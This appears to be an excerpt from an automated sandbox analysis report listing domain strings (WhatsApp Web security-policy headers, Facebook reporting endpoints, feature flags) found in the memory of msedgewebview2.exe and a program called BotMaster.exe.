                  Source: msedgewebview2.exe, 00000020.00000003.2398346870.00001B4400468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests;D equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 0000001D.00000003.2564262880.00002DDC00C70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests;[ equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 0000001D.00000003.2564262880.00002DDC00C70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests;[ equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 0000001D.00000002.3707687086.00002DDC00E94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests;default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests; equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 0000001D.00000002.3707687086.00002DDC00E94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests;default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests; equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 00000020.00000002.3650434721.00001B44001D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: e":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"} equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000002.3650434721.00001B44001D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: e":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}report-to="permissions_policy"\DD equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000002.3658956575.00001B44003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: et https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000002.3658956575.00001B44003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: et https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com[ equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000002.3662236273.00001B4400664000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: fE@ata: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000024.00000003.2334721555.000024540089C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000002.2429036422.000024540089C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://microsoftstart.msn.cn/*https://rewards.microsoft.com/*https://www.microsoftnews.com/*https://www.facebook.com/*www.staging-bing-int.comaction.getBadgeTextColorhttps://outlook.live.com/*https://rewards.bing.com/*https://www.microsoftnews.cn/*translatorserp.bing.comhttps://translator.bing.com/*manifest:action equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000026.00000003.2465710972.00004B1800894000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rewards.microsoft.com/*https://www.microsoftnews.com/*https://www.facebook.com/*www.staging-bing-int.comaction.getBadgeTextColorhttps://outlook.live.com/*https://rewards.bing.com/*https://www.microsoftnews.cn/*translatorserp.bing.comhttps://translator.bing.com/*manifest:actionPQ8 equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 0000001D.00000002.3695321952.00002DDC004B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000003.2334721555.000024540089C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000002.2429036422.000024540089C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/* equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000002.3658870464.00001B44003C4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2676119886.00001B4400378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ajax/browser_error_reports/ equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000002.3658870464.00001B44003C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ajax/browser_error_reports/.js equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 0000001D.00000002.3710183119.00002DDC01074000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2564433283.00002DDC01128000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2566414130.00002DDC011D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/browser_reporting/coep/?minimize=0 equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000002.3658376727.00001B440037C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2676119886.00001B4400378000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2393461202.00001B4400378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/browser_reporting/coep/?minimize=0acebook.com equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000002.3643336432.00001B4400088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/browser_reporting/coep/?minimize=0l=un equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000002.3658376727.00001B440037C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2676119886.00001B4400378000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2393461202.00001B4400378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/browser_reporting/coep/?minimize=0l=unknown equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000002.3643336432.00001B4400088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/browser_reporting/coep/?minimize=0r equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 0000001D.00000002.3710183119.00002DDC01074000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000002.3655936389.00001B4400284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/browser_reporting/coep/?minimize=0u equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 0000001D.00000002.3711231440.00002DDC01164000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/browser_reporting/coop/?minimize=0 equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 0000001D.00000002.3710183119.00002DDC01074000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2564433283.00002DDC01128000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2566414130.00002DDC011D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/browser_reporting/coop/?minimize=0 equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000002.3658376727.00001B440037C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2676119886.00001B4400378000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000002.3643336432.00001B4400088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/browser_reporting/coop/?minimize=0l=unknown equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000002.3661254657.00001B4400458000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https:\/\/www.facebook. equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000002.3661254657.00001B4400458000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https:\/\/www.facebook.om\/bro":86400,poin"htt equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000003.2567685056.00001B440044D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: lf' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests; equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000003.2567685056.00001B440044D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: lf' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests; equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 00000020.00000003.2479218149.00001B44005E8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2394439778.00001B44005E8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2568526081.00001B44005E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: m: *.*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests; equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 00000026.00000003.2529580323.00004B180119C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: m_lean_msg:[1645,"bool",!1,!1],qp_campaign_client_enabled:[3536,"bool",!1,!1],qp_edit_profile_banner_surface_enabled:[7549,"bool",!1,!0],qp_migration_to_graphql_enabled:[7551,"bool",!1,!1],qp_push_notifications_enabled:[4200,"bool",!1,!1],qpl_enabled:[212,"bool",!1,!0],qpl_initial_upload_delay:[1223,"int",5,1],qpl_sampling_as_string:[466,"string",'json:{"sampling":[]}','json:{"sampling":[]}'],qpl_upload_delay:[215,"int",1440,1],quantity_controls_enabled:[1480,"bool",!1,!0],query_verified_name_when_msg_differs:[2549,"bool",!0,!0],quick_mute_enabled:[2765,"bool",!1,!1],quick_promotion_banner_client_enabled:[3712,"bool",!1,!1],rabbit_enabled:[3603,"bool",!1,!1],rbi_change_delete_behavior_block_report_flows:[6187,"bool",!1,!0],rbi_revamped_block_report_dialog_design:[6186,"bool",!1,!0],rbi_show_consistent_block_dialog_all_entry_points:[6185,"bool",!1,!0],reaction_cleanup_days:[987,"int",31,31],reaction_history_sync:[1179,"bool",!1,!1],reactions_allowlisted_channels:[4699,"string","","120363144141162927,120363160538286018"],reactions_animations:[1361,"bool",!1,!0],reactions_animations_simple:[1485,"bool",!1,!0],reactions_announcement_only:[1150,"bool",!1,!1],reactions_chat_preview:[1605,"bool",!1,!0],reactions_keyboard_hides_three_flags:[1792,"bool",!1,!1],reactions_keyboard_hides_three_flags_desktop_beta_rollout:[1796,"bool",!1,!1],reactions_panel_prekeys_fetch_enabled:[1828,"bool",!1,!0],reactions_receive:[827,"bool",!1,!0],reactions_send:[828,"bool",!1,!0],reactions_skin_tone_aggregation:[1593,"bool",!1,!1],recent_emojis_sync:[3198,"bool",!1,!1],recent_sticker_rollout_phase:[1829,"int",4,4],recommended_channels_background_refresh:[4309,"int",144e5,18e5],recommended_channels_cache_max_ttl:[4308,"int",0,0],recommended_channels_fetch_limit:[5205,"int",20,20],report_block_classification_logging_enabled:[5245,"bool",!1,!0],report_string_comprehension:[3032,"bool",!1,!0],report_to_admin_enabled:[3696,"bool",!1,!0],report_to_admin_kill_switch:[3695,"bool",!1,!0],retry_receipt_error_code_enabled:[3750,"bool",!1,!0],revokes_logging_unsampled:[1865,"bool",!0,!0],reword_subject_to_group_name_enabled:[3088,"bool",!1,!0],row_buyer_order_revamp_m0_enabled:[4893,"bool",!1,!0],row_buyer_order_revamp_m0_nux_banner_enabled:[5518,"bool",!1,!0],rt_clean_reporting_tag:[6723,"int",-1,-1],rt_drop_message_invalid_type:[5793,"bool",!1,!1],rt_receive_reporting_tag:[5718,"bool",!1,!0],rt_send_reporting_tag:[5717,"bool",!1,!1],rt_sync_reporting_tag:[6578,"bool",!0,!0],rt_validate_message_type:[5716,"bool",!1,!0],saga_copy:[7044,"bool",!1,!0],saga_enabled:[5626,"bool",!1,!1],saga_mvp_enabled:[5881,"bool",!1,!1],saga_mvp_value:[6296,"int",0,0],saga_v1_test_enabled:[7752,"bool",!1,!1],seller_order_payment_request_enabled:[5574,"bool",!1,!1],seller_orders_management_revamp:[5190,"bool",!1,!1],send_cag_member_revokes_as_GDM:[3069,"bool",!0,!0],send_cart_cta_long_button_alternative_text_type:[2153,"int",0,0],send_cart_cta_long_button_enabled:[1660,"bool",!0,!0],send_document_thumb_
                  Source: msedgewebview2.exe, 00000026.00000003.2529580323.00004B180119C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: m_lean_msg:[1645,"bool",!1,!1],qp_campaign_client_enabled:[3536,"bool",!1,!1],qp_edit_profile_banner_surface_enabled:[7549,"bool",!1,!0],qp_migration_to_graphql_enabled:[7551,"bool",!1,!1],qp_push_notifications_enabled:[4200,"bool",!1,!1],qpl_enabled:[212,"bool",!1,!0],qpl_initial_upload_delay:[1223,"int",5,1],qpl_sampling_as_string:[466,"string",'json:{"sampling":[]}','json:{"sampling":[]}'],qpl_upload_delay:[215,"int",1440,1],quantity_controls_enabled:[1480,"bool",!1,!0],query_verified_name_when_msg_differs:[2549,"bool",!0,!0],quick_mute_enabled:[2765,"bool",!1,!1],quick_promotion_banner_client_enabled:[3712,"bool",!1,!1],rabbit_enabled:[3603,"bool",!1,!1],rbi_change_delete_behavior_block_report_flows:[6187,"bool",!1,!0],rbi_revamped_block_report_dialog_design:[6186,"bool",!1,!0],rbi_show_consistent_block_dialog_all_entry_points:[6185,"bool",!1,!0],reaction_cleanup_days:[987,"int",31,31],reaction_history_sync:[1179,"bool",!1,!1],reactions_allowlisted_channels:[4699,"string","","120363144141162927,120363160538286018"],reactions_animations:[1361,"bool",!1,!0],reactions_animations_simple:[1485,"bool",!1,!0],reactions_announcement_only:[1150,"bool",!1,!1],reactions_chat_preview:[1605,"bool",!1,!0],reactions_keyboard_hides_three_flags:[1792,"bool",!1,!1],reactions_keyboard_hides_three_flags_desktop_beta_rollout:[1796,"bool",!1,!1],reactions_panel_prekeys_fetch_enabled:[1828,"bool",!1,!0],reactions_receive:[827,"bool",!1,!0],reactions_send:[828,"bool",!1,!0],reactions_skin_tone_aggregation:[1593,"bool",!1,!1],recent_emojis_sync:[3198,"bool",!1,!1],recent_sticker_rollout_phase:[1829,"int",4,4],recommended_channels_background_refresh:[4309,"int",144e5,18e5],recommended_channels_cache_max_ttl:[4308,"int",0,0],recommended_channels_fetch_limit:[5205,"int",20,20],report_block_classification_logging_enabled:[5245,"bool",!1,!0],report_string_comprehension:[3032,"bool",!1,!0],report_to_admin_enabled:[3696,"bool",!1,!0],report_to_admin_kill_switch:[3695,"bool",!1,!0],retry_receipt_error_code_enabled:[3750,"bool",!1,!0],revokes_logging_unsampled:[1865,"bool",!0,!0],reword_subject_to_group_name_enabled:[3088,"bool",!1,!0],row_buyer_order_revamp_m0_enabled:[4893,"bool",!1,!0],row_buyer_order_revamp_m0_nux_banner_enabled:[5518,"bool",!1,!0],rt_clean_reporting_tag:[6723,"int",-1,-1],rt_drop_message_invalid_type:[5793,"bool",!1,!1],rt_receive_reporting_tag:[5718,"bool",!1,!0],rt_send_reporting_tag:[5717,"bool",!1,!1],rt_sync_reporting_tag:[6578,"bool",!0,!0],rt_validate_message_type:[5716,"bool",!1,!0],saga_copy:[7044,"bool",!1,!0],saga_enabled:[5626,"bool",!1,!1],saga_mvp_enabled:[5881,"bool",!1,!1],saga_mvp_value:[6296,"int",0,0],saga_v1_test_enabled:[7752,"bool",!1,!1],seller_order_payment_request_enabled:[5574,"bool",!1,!1],seller_orders_management_revamp:[5190,"bool",!1,!1],send_cag_member_revokes_as_GDM:[3069,"bool",!0,!0],send_cart_cta_long_button_alternative_text_type:[2153,"int",0,0],send_cart_cta_long_button_enabled:[1660,"bool",!0,!0],send_document_thumb_
                  Source: BotMaster.exe, 0000001A.00000000.2266898531.0000000000DA2000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: mailto:{0}qhttps://www.youtube.com/channel/UCYVg9u9eLx2gQ80OlwoJKYwAhttps://twitter.com/khaldoun_bazOhttps://www.instagram.com/mediaplus.me/ equals www.twitter.com (Twitter)
                  Source: BotMaster.exe, 0000001A.00000000.2266898531.0000000000DA2000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: mailto:{0}qhttps://www.youtube.com/channel/UCYVg9u9eLx2gQ80OlwoJKYwAhttps://twitter.com/khaldoun_bazOhttps://www.instagram.com/mediaplus.me/ equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 00000020.00000003.2623847305.00001B440043C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2622209243.00001B4400438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: o *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests; equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 00000020.00000003.2676119886.00001B4400378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: oqCVNwO8VFtcZWyXY0BOOr4Nkt0DjkeBGw==content-length:791date:Sun, 10 Mar 2024 16:46:27 GMTx-fb-connection-quality:MODERATE; q=0.3, rtt=227, rtx=0, c=1646, mss=1232, tbw=4611641, tp=3814, tpl=0, uplat=1, ullat=-1alt-svc:h3=":443"; ma=86400priority:u=1,i uplat=173, ullat=0alt-svc:h3=":443"; ma=86400priority:u=4,i 200content-encoding:brcontent-type:application/javascript; charset=UTF-8vary:Accept-Encoding, Referervary:Accept-Encodingreporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, 